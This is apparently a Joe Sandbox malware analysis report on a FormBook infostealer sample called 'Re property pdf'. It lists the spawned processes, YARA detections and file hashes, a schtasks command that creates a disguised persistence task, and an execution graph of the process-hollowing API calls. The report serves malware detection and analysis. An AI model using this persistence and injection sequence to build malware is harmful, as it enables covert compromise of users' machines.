                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            Imagebase:0x7ff693ab0000
                                                                                                                            File size:496'640 bytes
                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:9
                                                                                                                            Start time:06:56:15
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp"
                                                                                                                            Imagebase:0x610000
                                                                                                                            File size:187'904 bytes
                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:10
                                                                                                                            Start time:06:56:15
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:11
                                                                                                                            Start time:06:56:15
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
                                                                                                                            Imagebase:0x180000
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5 hash:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:12
                                                                                                                            Start time:06:56:15
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
                                                                                                                            Imagebase:0xbf0000
                                                                                                                            File size:702'976 bytes
                                                                                                                            MD5 hash:A217FF7DA729F56FAF0BB3DE4AD87F40
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:16
                                                                                                                            Start time:06:56:43
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe"
                                                                                                                            Imagebase:0xc20000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4215060092.0000000005920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4212104548.0000000002730000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:17
                                                                                                                            Start time:06:56:45
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Windows\SysWOW64\PresentationHost.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\SysWOW64\PresentationHost.exe"
                                                                                                                            Imagebase:0x60000
                                                                                                                            File size:256'000 bytes
                                                                                                                            MD5 hash:C6671F8B9F073785FD617661AD1F1C45
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:18
                                                                                                                            Start time:06:57:08
                                                                                                                            Start date:19/10/2024
                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                            File size:676'768 bytes
                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:12%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:1.8%
                                                                                                                              Total number of Nodes:340
                                                                                                                              Total number of Limit Nodes:12
                                                                                                                              execution_graph 39701 130d040 39702 130d086 39701->39702 39706 130d628 39702->39706 39709 130d618 39702->39709 39703 130d173 39713 130d27c 39706->39713 39710 130d628 39709->39710 39711 130d27c DuplicateHandle 39710->39711 39712 130d656 39711->39712 39712->39703 39714 130d690 DuplicateHandle 39713->39714 39715 130d656 39714->39715 39715->39703 39690 7728f50 39691 77290db 39690->39691 39692 7728f76 39690->39692 39692->39691 39694 7724754 39692->39694 39695 77291d0 PostMessageW 39694->39695 39697 772923c 39695->39697 39697->39692 39353 77252b4 39355 77252c7 39353->39355 39354 7725170 39355->39354 39359 7727d70 39355->39359 39365 7727de6 39355->39365 39372 7727d80 39355->39372 39360 7727d74 39359->39360 39378 77280a3 39360->39378 39394 7728041 39360->39394 39410 77280b0 39360->39410 39361 7727da2 39361->39355 39366 7727d74 39365->39366 39367 7727de9 39365->39367 39369 77280a3 14 API calls 39366->39369 39370 77280b0 14 API calls 39366->39370 39371 7728041 14 API calls 39366->39371 39367->39355 39368 7727da2 39368->39355 39369->39368 39370->39368 39371->39368 39373 7727d9a 39372->39373 39375 77280a3 14 API calls 39373->39375 39376 77280b0 14 API calls 39373->39376 39377 7728041 14 API calls 39373->39377 39374 7727da2 39374->39355 39375->39374 39376->39374 39377->39374 39379 77280ae 39378->39379 39380 772808d 39378->39380 39381 77280d7 39379->39381 39425 77282dc 39379->39425 39433 772835c 39379->39433 39441 772831f 39379->39441 39453 772866b 39379->39453 39465 7728555 39379->39465 39473 7728306 39379->39473 39478 7728286 39379->39478 39488 7728996 39379->39488 39493 7728471 39379->39493 39500 77285c1 39379->39500 39505 77283f0 39379->39505 39510 77284bd 39379->39510 39380->39361 39381->39361 39395 77280be 39394->39395 39397 772804b 39394->39397 39398 77283f0 2 API calls 39395->39398 39399 77285c1 2 API calls 39395->39399 39400 7728471 4 API calls 39395->39400 39401 7728996 2 API calls 39395->39401 39402 7728286 6 API calls 39395->39402 39403 7728306 2 API calls 39395->39403 39404 7728555 4 API calls 39395->39404 39405 772866b 6 API calls 39395->39405 39406 772831f 6 API calls 39395->39406 39407 772835c 4 API calls 39395->39407 39408 77282dc 4 API calls 39395->39408 39409 77284bd 2 API calls 39395->39409 39396 77280d7 39396->39361 39397->39361 39398->39396 39399->39396 39400->39396 39401->39396 39402->39396 39403->39396 39404->39396 39405->39396 39406->39396 39407->39396 39408->39396 39409->39396 39411 77280c5 39410->39411 39412 77280d7 39411->39412 39413 77283f0 2 API calls 39411->39413 39414 77285c1 2 API calls 39411->39414 39415 7728471 4 API calls 39411->39415 39416 7728996 2 API calls 39411->39416 39417 7728286 6 API calls 39411->39417 39418 7728306 2 API calls 39411->39418 39419 7728555 4 API calls 39411->39419 39420 772866b 6 API calls 39411->39420 39421 772831f 6 API calls 39411->39421 39422 772835c 4 API calls 39411->39422 39423 77282dc 4 API calls 39411->39423 39424 77284bd 2 API calls 39411->39424 39412->39361 39413->39412 39414->39412 39415->39412 39416->39412 39417->39412 39418->39412 39419->39412 39420->39412 39421->39412 39422->39412 39423->39412 39424->39412 39426 77282e5 39425->39426 39427 77282f7 39426->39427 39515 7724ab0 39426->39515 39519 7724ab8 39426->39519 39523 7724c80 39427->39523 39527 7724c88 39427->39527 39428 7728718 39439 7724ab0 WriteProcessMemory 39433->39439 39440 7724ab8 WriteProcessMemory 39433->39440 39434 77282e5 39434->39433 39435 77282f7 39434->39435 39437 7724c80 NtUnmapViewOfSection 39435->39437 39438 7724c88 NtUnmapViewOfSection 39435->39438 39436 7728718 39437->39436 39438->39436 39439->39434 39440->39434 39442 7728329 39441->39442 39442->39381 39443 77282e5 39442->39443 39531 7724ba8 39442->39531 39535 7724ba1 39442->39535 39444 7728baa 39443->39444 39445 77282f7 39443->39445 39451 7724ab0 WriteProcessMemory 39443->39451 39452 7724ab8 WriteProcessMemory 39443->39452 39444->39381 39449 7724c80 NtUnmapViewOfSection 39445->39449 39450 7724c88 NtUnmapViewOfSection 39445->39450 39446 7728718 39449->39446 39450->39446 39451->39443 39452->39443 39454 772833a 39453->39454 39454->39381 39455 77282e5 39454->39455 39463 7724ba1 ReadProcessMemory 39454->39463 39464 7724ba8 ReadProcessMemory 39454->39464 39456 7728baa 39455->39456 39457 77282f7 39455->39457 39461 7724ab0 WriteProcessMemory 39455->39461 39462 7724ab8 WriteProcessMemory 39455->39462 39456->39381 39459 7724c80 NtUnmapViewOfSection 39457->39459 39460 7724c88 NtUnmapViewOfSection 39457->39460 39458 7728718 39459->39458 39460->39458 39461->39455 39462->39455 39463->39454 39464->39454 39466 7728803 39465->39466 39547 7724518 39466->39547 39551 7724510 39466->39551 39467 77284d5 39539 7724028 39467->39539 39543 7724030 39467->39543 39468 7728762 39468->39381 39474 7728694 39473->39474 39476 7724510 Wow64SetThreadContext 39474->39476 39477 7724518 Wow64SetThreadContext 39474->39477 39475 77286af 39476->39475 39477->39475 39556 7724d40 39478->39556 39560 7724d34 39478->39560 39479 77282f7 39482 7724c80 NtUnmapViewOfSection 39479->39482 39483 7724c88 NtUnmapViewOfSection 39479->39483 39480 77282b6 39480->39479 39484 7724ab0 WriteProcessMemory 39480->39484 39485 7724ab8 WriteProcessMemory 39480->39485 39481 7728718 39482->39481 39483->39481 39484->39480 39485->39480 39489 77289a2 39488->39489 39491 7724ab0 WriteProcessMemory 39489->39491 39492 7724ab8 WriteProcessMemory 39489->39492 39490 7728a32 39491->39490 39492->39490 39565 77249f1 39493->39565 39569 77249f8 39493->39569 39494 7728493 39495 7728603 39494->39495 39496 7724ab0 WriteProcessMemory 39494->39496 39497 7724ab8 WriteProcessMemory 39494->39497 39495->39381 39496->39495 39497->39495 39501 77285c7 39500->39501 39503 7724ab0 WriteProcessMemory 39501->39503 39504 7724ab8 WriteProcessMemory 39501->39504 39502 7728603 39502->39381 39503->39502 39504->39502 39506 77283f6 39505->39506 39507 7728762 39506->39507 39508 7724030 ResumeThread 39506->39508 39509 7724028 ResumeThread 39506->39509 39507->39381 39508->39507 39509->39507 39511 77284d5 39510->39511 39513 7724030 ResumeThread 39511->39513 39514 7724028 ResumeThread 39511->39514 39512 7728762 39512->39381 39513->39512 39514->39512 39516 7724ab4 WriteProcessMemory 39515->39516 39518 7724b57 39516->39518 39518->39426 39520 7724abb WriteProcessMemory 39519->39520 39522 7724b57 39520->39522 39522->39426 39524 7724c84 NtUnmapViewOfSection 39523->39524 39526 7724cfc 39524->39526 39526->39428 39528 7724c8b NtUnmapViewOfSection 39527->39528 39530 7724cfc 39528->39530 39530->39428 39532 7724bab ReadProcessMemory 39531->39532 39534 7724c37 39532->39534 39534->39442 39537 7724ba4 ReadProcessMemory 39535->39537 39538 7724c37 39537->39538 39538->39442 39540 7724070 ResumeThread 39539->39540 39542 77240a1 39540->39542 39542->39468 39544 7724070 ResumeThread 39543->39544 39546 77240a1 39544->39546 39546->39468 39548 772451b Wow64SetThreadContext 39547->39548 39550 77245a5 39548->39550 39550->39467 39552 7724514 39551->39552 39553 772457d Wow64SetThreadContext 39552->39553 39554 77244e0 39552->39554 39555 77245a5 39553->39555 39554->39467 39555->39467 39557 7724dc9 39556->39557 39557->39557 39558 7724f2e CreateProcessA 39557->39558 39559 7724f8b 39558->39559 39562 7724d38 39560->39562 39561 7724d08 39561->39480 39562->39561 39563 7724f2e CreateProcessA 39562->39563 39564 7724f8b 39563->39564 39566 77249f4 VirtualAllocEx 39565->39566 39568 7724a75 39566->39568 39568->39494 39570 77249fb VirtualAllocEx 39569->39570 39572 7724a75 39570->39572 39572->39494 39716 77251c5 39718 77251cf 39716->39718 39717 7725170 39718->39717 39719 7727d70 14 API calls 39718->39719 39720 7727d80 14 API calls 39718->39720 39721 7727de6 14 API calls 39718->39721 39719->39718 39720->39718 39721->39718 39722 12bd01c 39723 12bd034 39722->39723 39724 12bd08e 39723->39724 39729 52f1a97 39723->39729 39734 52f2818 39723->39734 39739 52f2808 39723->39739 39744 52f1aa8 39723->39744 39730 52f1aa8 39729->39730 39732 52f2808 2 API calls 39730->39732 39733 52f2818 2 API calls 39730->39733 39731 52f1aef 39731->39724 39732->39731 39733->39731 39735 52f2845 39734->39735 39736 52f2877 39735->39736 39749 52f29a0 39735->39749 39754 52f2990 39735->39754 39740 52f280d 39739->39740 39741 52f2877 39740->39741 39742 52f29a0 2 API calls 39740->39742 39743 52f2990 2 API calls 39740->39743 39742->39741 39743->39741 39745 52f1ace 39744->39745 39747 52f2808 2 API calls 39745->39747 39748 52f2818 2 API calls 39745->39748 39746 52f1aef 39746->39724 39747->39746 39748->39746 39751 52f29b4 39749->39751 39750 52f2a40 39750->39736 39759 52f2a48 39751->39759 39763 52f2a58 39751->39763 39756 52f29a0 39754->39756 39755 52f2a40 39755->39736 39757 52f2a48 2 API calls 39756->39757 39758 52f2a58 2 API calls 39756->39758 39757->39755 39758->39755 39760 52f2a58 39759->39760 39761 52f2a69 39760->39761 39766 52f401b 39760->39766 39761->39750 39764 52f2a69 39763->39764 39765 52f401b 2 API calls 39763->39765 39764->39750 39765->39764 39770 52f4030 39766->39770 39774 52f4040 39766->39774 39767 52f402a 39767->39761 39771 52f4040 39770->39771 39772 52f40da CallWindowProcW 39771->39772 39773 52f4089 39771->39773 39772->39773 39773->39767 39775 52f4082 39774->39775 39777 52f4089 39774->39777 39776 52f40da CallWindowProcW 39775->39776 39775->39777 39776->39777 39777->39767 39573 1304668 39574 130467a 39573->39574 39575 1304686 39574->39575 39579 1304779 39574->39579 39584 1303e34 39575->39584 39577 13046a5 39580 130479d 39579->39580 39588 1304888 39580->39588 39592 1304879 39580->39592 39585 1303e3f 39584->39585 39600 1305c44 39585->39600 39587 1306fe0 39587->39577 39589 13048af 39588->39589 39591 130498c 39589->39591 39596 13044b4 39589->39596 39593 1304888 39592->39593 39594 13044b4 CreateActCtxA 39593->39594 39595 130498c 39593->39595 39594->39595 39597 1305918 CreateActCtxA 39596->39597 39599 13059db 39597->39599 39601 1305c4f 39600->39601 39604 1305c64 39601->39604 39603 13070ed 39603->39587 39605 1305c6f 39604->39605 39608 1305c94 39605->39608 39607 13071c2 39607->39603 39609 1305c9f 39608->39609 39612 1305cc4 39609->39612 39611 13072c5 39611->39607 39613 1305ccf 39612->39613 39615 13085cb 39613->39615 39619 130ac78 39613->39619 39614 1308609 39614->39611 39615->39614 39623 130cd68 39615->39623 39628 130cd78 39615->39628 39633 130acb0 39619->39633 39636 130aca0 39619->39636 39620 130ac8e 39620->39615 39624 130cd99 39623->39624 39625 130cdbd 39624->39625 39644 130cf28 39624->39644 39648 130cf19 39624->39648 39625->39614 39629 130cd99 39628->39629 39630 130cdbd 39629->39630 39631 130cf28 3 API calls 39629->39631 39632 130cf19 3 API calls 39629->39632 39630->39614 39631->39630 39632->39630 39639 130ada8 39633->39639 39634 130acbf 39634->39620 39637 130acbf 39636->39637 39638 130ada8 GetModuleHandleW 39636->39638 39637->39620 39638->39637 39640 130addc 39639->39640 39641 130adb9 39639->39641 39640->39634 39641->39640 39642 130afe0 GetModuleHandleW 39641->39642 39643 130b00d 39642->39643 39643->39634 39646 130cf35 39644->39646 39645 130cf6f 39645->39625 39646->39645 39652 130bae0 39646->39652 39649 130cf28 39648->39649 39650 130bae0 3 API calls 39649->39650 39651 130cf6f 39649->39651 39650->39651 39651->39625 39653 130baeb 39652->39653 39654 130dc88 39653->39654 39656 130d2dc 39653->39656 39657 130d2e7 39656->39657 39658 1305cc4 3 API calls 39657->39658 39659 130dcf7 39658->39659 39663 130fa88 39659->39663 39669 130fa70 39659->39669 39660 130dd31 39660->39654 39665 130fab9 39663->39665 39666 130fbb9 39663->39666 39664 130fac5 39664->39660 39665->39664 39667 52f09b0 CreateWindowExW CreateWindowExW 39665->39667 39668 52f09c0 CreateWindowExW CreateWindowExW 39665->39668 39666->39660 39667->39666 39668->39666 39671 130fa88 39669->39671 39670 130fac5 39670->39660 39671->39670 39672 52f09b0 CreateWindowExW CreateWindowExW 39671->39672 39673 52f09c0 CreateWindowExW CreateWindowExW 39671->39673 39672->39670 39673->39670 39698 75007f8 39699 7503438 CreateIconFromResourceEx 39698->39699 39700 75034b6 39699->39700 39674 52f75f0 39675 52f761d 39674->39675 39678 52f6af8 39675->39678 39677 52f767f 39679 52f6b03 39678->39679 39680 52f98ea 39679->39680 39681 1305cc4 3 API calls 39679->39681 39683 1308308 39679->39683 39680->39677 39681->39680 39684 130830b 39683->39684 39686 13085cb 39684->39686 39687 130ac78 GetModuleHandleW 39684->39687 39685 1308609 39685->39680 39686->39685 39688 130cd78 3 API calls 39686->39688 39689 130cd68 3 API calls 39686->39689 39687->39686 39688->39685 39689->39685

                                                                                                                              Executed Functions

                                                                                                                              Function 075007B0 Relevance: 6.9, Strings: 5, Instructions: 619COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 294 75007b0-7502ae8 297 7502fcb-7503034 294->297 298 7502aee-7502af3 294->298 305 750303b-75030c3 297->305 298->297 299 7502af9-7502b16 298->299 299->305 306 7502b1c-7502b20 299->306 350 75030ce-750314e 305->350 307 7502b22-7502b2c call 75007c0 306->307 308 7502b2f-7502b33 306->308 307->308 309 7502b42-7502b49 308->309 310 7502b35-7502b3f call 75007c0 308->310 316 7502c64-7502c69 309->316 317 7502b4f-7502b7f 309->317 310->309 319 7502c71-7502c76 316->319 320 7502c6b-7502c6f 316->320 327 750334e-7503374 317->327 329 7502b85-7502c58 call 75007cc * 2 317->329 324 7502c88-7502cb8 call 75007d8 * 3 319->324 320->319 323 7502c78-7502c7c 320->323 326 7502c82-7502c85 323->326 323->327 324->350 351 7502cbe-7502cc1 324->351 326->324 338 7503384 327->338 339 7503376-7503382 327->339 329->316 358 7502c5a 329->358 343 7503387-750338c 338->343 339->343 365 7503155-75031d7 350->365 351->350 353 7502cc7-7502cc9 351->353 353->350 354 7502ccf-7502d04 353->354 354->365 366 7502d0a-7502d13 354->366 358->316 371 75031df-7503261 365->371 368 7502e76-7502e7a 366->368 369 7502d19-7502d73 call 75007d8 * 2 call 75007e8 * 2 366->369 370 7502e80-7502e84 368->370 368->371 410 7502d85 369->410 411 7502d75-7502d7e 369->411 375 7503269-7503296 370->375 376 7502e8a-7502e90 370->376 371->375 389 750329d-750331d 375->389 380 7502e92 376->380 381 7502e94-7502ec9 376->381 385 7502ed0-7502ed6 380->385 381->385 388 7502edc-7502ee4 385->388 385->389 393 7502ee6-7502eea 388->393 394 7502eeb-7502eed 388->394 444 7503324-7503346 389->444 393->394 399 7502f4f-7502f55 394->399 400 7502eef-7502f13 394->400 405 7502f74-7502fa2 399->405 406 7502f57-7502f72 399->406 433 7502f15-7502f1a 400->433 434 7502f1c-7502f20 400->434 426 7502faa-7502fb6 405->426 406->426 418 7502d89-7502d8b 410->418 417 7502d80-7502d83 411->417 411->418 417->418 424 7502d92-7502d96 418->424 425 7502d8d 418->425 430 7502da4-7502daa 424->430 431 7502d98-7502d9f 424->431 425->424 426->444 445 7502fbc-7502fc8 426->445 438 7502db4-7502db9 430->438 439 7502dac-7502db2 430->439 437 7502e41-7502e45 431->437 441 7502f2c-7502f3d 433->441 434->327 442 7502f26-7502f29 434->442 446 7502e64-7502e70 437->446 447 7502e47-7502e61 437->447 448 7502dbf-7502dc5 438->448 439->448 450 7502f45-7502f4d 441->450 442->441 444->327 446->368 446->369 447->446 453 7502dc7-7502dc9 448->453 454 7502dcb-7502dd0 448->454 450->426 459 7502dd2-7502de4 453->459 454->459 462 7502de6-7502dec 459->462 463 7502dee-7502df3 459->463 466 7502df9-7502e00 462->466 463->466 470 7502e02-7502e04 466->470 471 7502e06 466->471 474 7502e0b-7502e16 470->474 471->474 475 7502e18-7502e1b 474->475 476 7502e3a 474->476 475->437 478 7502e1d-7502e23 475->478 476->437 479 7502e25-7502e28 478->479 480 7502e2a-7502e33 478->480 479->476 479->480 480->437 482 7502e35-7502e38 480->482 482->437 482->476
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795524867.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 074F0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1795495475.00000000074F0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_74f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Hjq$Hjq$Hjq$Hjq$Hjq
                                                                                                                              • API String ID: 0-1529018591
                                                                                                                              • Opcode ID: 11e4456c87c30083ae25cb8d9fd61c0d28e5bd5f0d33859a3839016bfc77ff3a
                                                                                                                              • Instruction ID: 1f2130137691a81a063f2772951740e6408e02cab0b4699b2f15d2ea5ffc03bb
                                                                                                                              • Opcode Fuzzy Hash: 11e4456c87c30083ae25cb8d9fd61c0d28e5bd5f0d33859a3839016bfc77ff3a
                                                                                                                              • Instruction Fuzzy Hash: F5326EB1E002598FDB54DFA8C8947AEBBB2BF84300F14856AD409AB395DF349D85CF91
                                                                                                                              Function 0772A750 Relevance: 1.8, Strings: 1, Instructions: 586COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1462 772a750-772a772 1463 772ab22-772ab27 1462->1463 1464 772a778-772a7b3 call 7729fdc call 7729fec call 772a33c 1462->1464 1466 772ab31-772ab34 1463->1466 1467 772ab29-772ab2b 1463->1467 1476 772a7c6-772a7e6 1464->1476 1477 772a7b5-772a7bf 1464->1477 1470 772ab3c-772ab44 1466->1470 1467->1466 1472 772ab4a-772ab51 1470->1472 1479 772a7e8-772a7f2 1476->1479 1480 772a7f9-772a819 1476->1480 1477->1476 1479->1480 1482 772a81b-772a825 1480->1482 1483 772a82c-772a84c 1480->1483 1482->1483 1485 772a84e-772a858 1483->1485 1486 772a85f-772a868 call 772a34c 1483->1486 1485->1486 1489 772a86a-772a885 call 772a34c 1486->1489 1490 772a88c-772a895 call 772a35c 1486->1490 1489->1490 1495 772a897-772a8b2 call 772a35c 1490->1495 1496 772a8b9-772a8c2 call 772a36c 1490->1496 1495->1496 1502 772a8c4-772a8c8 call 772a37c 1496->1502 1503 772a8cd-772a8e9 1496->1503 1502->1503 1507 772a901-772a905 1503->1507 1508 772a8eb-772a8f1 1503->1508 1511 772a907-772a918 call 772a38c 1507->1511 1512 772a91f-772a967 1507->1512 1509 772a8f3 1508->1509 1510 772a8f5-772a8f7 1508->1510 1509->1507 1510->1507 1511->1512 1518 772a98b-772a992 1512->1518 1519 772a969 1512->1519 1521 772a994-772a9a3 1518->1521 1522 772a9a9-772a9b7 call 772a39c 1518->1522 1520 772a96c-772a972 1519->1520 1524 772ab52-772ab91 1520->1524 1525 772a978-772a97e 1520->1525 1521->1522 1531 772a9c1-772a9eb 1522->1531 1532 772a9b9-772a9bb 1522->1532 1533 772ab93-772abb4 1524->1533 1534 772abf0-772ac00 1524->1534 1528 772a980-772a982 1525->1528 1529 772a988-772a989 1525->1529 1528->1529 1529->1518 1529->1520 1548 772aa18-772aa34 1531->1548 1549 772a9ed-772a9fb 1531->1549 1532->1531 1533->1534 1538 772abb6-772abbc 1533->1538 1540 772add6-772addd 1534->1540 1541 772ac06-772ac10 1534->1541 1546 772abca-772abcf 1538->1546 1547 772abbe-772abc0 1538->1547 1544 772addf-772ade7 call 77247d4 1540->1544 1545 772adec-772adff 1540->1545 1542 772ac12-772ac19 1541->1542 1543 772ac1a-772ac24 1541->1543 1550 772ac2a-772ac6a 1543->1550 1551 772ae09-772ae74 1543->1551 1544->1545 1553 772abd1-772abd5 1546->1553 1554 772abdc-772abe9 1546->1554 1547->1546 1559 772aa36-772aa40 1548->1559 1560 772aa47-772aa6e call 772a3ac 1548->1560 1549->1548 1562 772a9fd-772aa11 1549->1562 1579 772ac82-772ac86 1550->1579 1580 772ac6c-772ac72 1550->1580 1553->1554 1554->1534 1559->1560 1571 772aa70-772aa76 1560->1571 1572 772aa86-772aa8a 1560->1572 1562->1548 1577 772aa7a-772aa7c 1571->1577 1578 772aa78 1571->1578 1574 772aaa5-772aac1 1572->1574 1575 772aa8c-772aa9e 1572->1575 1589 772aac3-772aac9 1574->1589 1590 772aad9-772aadd 1574->1590 1575->1574 1577->1572 1578->1572 1581 772acb3-772accb call 772a4c0 1579->1581 1582 772ac88-772acad 1579->1582 1586 772ac76-772ac78 1580->1586 1587 772ac74 1580->1587 1603 772acd8-772ace0 1581->1603 1604 772accd-772acd2 1581->1604 1582->1581 1586->1579 1587->1579 1594 772aacb 1589->1594 1595 772aacd-772aacf 1589->1595 1590->1472 1596 772aadf-772aaed 1590->1596 1594->1590 1595->1590 1601 772aaff-772ab03 1596->1601 1602 772aaef-772aafd 1596->1602 1609 772ab09-772ab21 1601->1609 1602->1601 1602->1609 1606 772ace2-772acf0 1603->1606 1607 772acf6-772ad15 1603->1607 1604->1603 1606->1607 1612 772ad17-772ad1d 1607->1612 1613 772ad2d-772ad31 1607->1613 1615 772ad21-772ad23 1612->1615 1616 772ad1f 1612->1616 1617 772ad33-772ad40 1613->1617 1618 772ad8a-772add3 1613->1618 1615->1613 1616->1613 1622 772ad42-772ad74 1617->1622 1623 772ad76-772ad83 1617->1623 1618->1540 1622->1623 1623->1618
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: H
                                                                                                                              • API String ID: 0-2852464175
                                                                                                                              • Opcode ID: b9d0975d3d6b765c7039a6467c4ddc992485d76bdec345136309abefc72d6324
                                                                                                                              • Instruction ID: 73334c5ab1a3e41ca037c55f2390da92e560a7b2d7c1060a95aaf5cbac4f920c
                                                                                                                              • Opcode Fuzzy Hash: b9d0975d3d6b765c7039a6467c4ddc992485d76bdec345136309abefc72d6324
                                                                                                                              • Instruction Fuzzy Hash: 6822DCB07012158FDB19DBA9C5A0BAEB7F6AF89344F258469E516DB391CF30EC02CB51
                                                                                                                              Function 07724C80 Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 07724CED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SectionUnmapView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 498011366-0
                                                                                                                              • Opcode ID: 98af118ae57d7d6c63fd98d2c6ccb653df2c2fd85f262ff6b23be8bb706e3108
